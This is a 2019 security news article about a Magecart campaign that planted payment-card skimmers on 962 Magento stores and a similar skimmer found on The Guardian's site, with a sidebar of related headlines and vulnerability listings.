8 July 2019

A large-scale Magecart campaign hits over 960 e-commerce stores

A large-scale Magecart campaign hits over 960 e-commerce stores

Security researchers spotted a new massive payment card skimming campaign that already compromised 962 online stores running on the Magento CMS. Sanguine Security researcher Willem de Groot, who uncovered the attacks, believes that the cybercriminals behind the campaign somehow managed to automate the attacks seeing that the card skimming script was added within a 24-hour timeframe, which is nearly impossible to do manually in such a short time.

Although Sanguine Security did not share information on how exactly such automated Magecart attacks against e-commerce websites would work the procedure most likely involved scanning for and exploiting security flaws in the stores' software. De Groot speculates that threat actors may have compromised the sites that were not patched against PHP object injection exploits. The company is still investigating the incident so at the moment it is unclear how the online stores were hacked, but the researchers have decoded the JavaScript-based payment data skimmer script and uploaded it to GitHub Gist. The skimmer script is able to gather credit card data, names, phones, and addresses from compromised websites.

According to de Groot, the list of hacked sites includes victims from around the world and while most of them are small, several stores belong to large enterprises.

The security researcher who is known online as Micham discovered another attack attributed to the Magecart group, hackers injected a malicious skimmer in the The Guardian site via old AWS S3 bucket and using wix-cloud[.]com as a skimmer gate.

Magecart – is an umbrella term used to cover a number of cybercriminal groups specializing in skimming credit card details from unsecured payment forms on websites. Security firms have been tracking the activities of a dozen Magecart groups since at least 2015. The hacking groups implant skimming script into compromised online stores in order to steal payment card data, but they are quite different from each other and some of them use more advanced techniques, in particular, Group 4 appears to be more sophisticated.

Back to the list

Latest Posts

“Agent Smith” malware infected more than 25 million Android devices

“Agent Smith” malware infected more than 25 million Android devices

The malware leverages known Android exploits and automatically replaces installed apps with malicious clones without users’ knowledge or interaction.
15 July 2019
Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Since the beginning of the campaign in April 2019 the group has continuously been scanning the Internet for insecure Amazon S3 buckets.
12 July 2019
Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

The exploit for CVE-2019-1132 created by the Buhtrap group relies on popup menu objects.
11 July 2019
Featured vulnerabilities
Denial of service in MatrixSSL
Medium Patched | 15 Jul, 2019
Denial of service in Apple iMessage
Medium Patched | 15 Jul, 2019
Multiple vulnerabilities in Redis
Medium Patched | 11 Jul, 2019
Reverse Tabnabbing in Quill
Low Not Patched | 11 Jul, 2019
Remote code injection in domokeeper
High Not Patched | 11 Jul, 2019